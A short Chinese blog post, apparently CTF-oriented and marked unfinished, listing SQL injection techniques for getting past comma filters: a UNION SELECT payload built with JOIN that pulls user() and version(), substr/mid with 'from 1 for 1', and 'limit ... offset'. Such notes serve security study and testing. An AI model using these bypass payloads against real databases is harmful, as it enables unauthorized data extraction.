SQL注入绕过
绕过逗号
-
使用join关键字
select id,ip from client_ip where 1>2 union select from ((select user())a JOIN (select version())b);join基本使用例子:
-
使用 from 1 for 1
select substr(database() from 1 for 1);
select mid(database() from 1 for 1); -
使用offset关键字
select * from news limit 0,1
等价于下面这条SQL语句
select * from yang limit 1 offset 0
(未完,待续)
本文来自博客园,作者:admax11,转载请注明原文链接:https://www.cnblogs.com/ctfisnull/p/15110408.html